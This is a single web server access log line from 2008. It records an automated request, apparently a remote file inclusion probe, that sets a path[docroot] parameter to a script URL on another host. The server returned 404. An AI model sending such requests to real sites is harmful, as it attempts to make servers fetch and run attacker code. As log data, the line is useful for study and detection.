121.124.127.40 - - [10/Nov/2008:08:28:29 -0800] "GET /logs/access_080430.log//?path%5Bdocroot%5D=http://www.300radio.com/sondage/image/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
